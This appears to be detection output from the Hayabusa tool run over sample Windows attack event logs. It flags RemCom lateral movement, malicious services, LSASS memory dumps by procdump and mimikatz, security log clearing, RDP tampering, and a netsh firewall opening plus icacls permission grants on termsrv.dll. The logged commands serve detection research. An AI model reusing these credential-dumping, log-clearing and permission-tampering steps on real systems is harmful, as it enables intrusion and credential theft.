2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:44.637 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
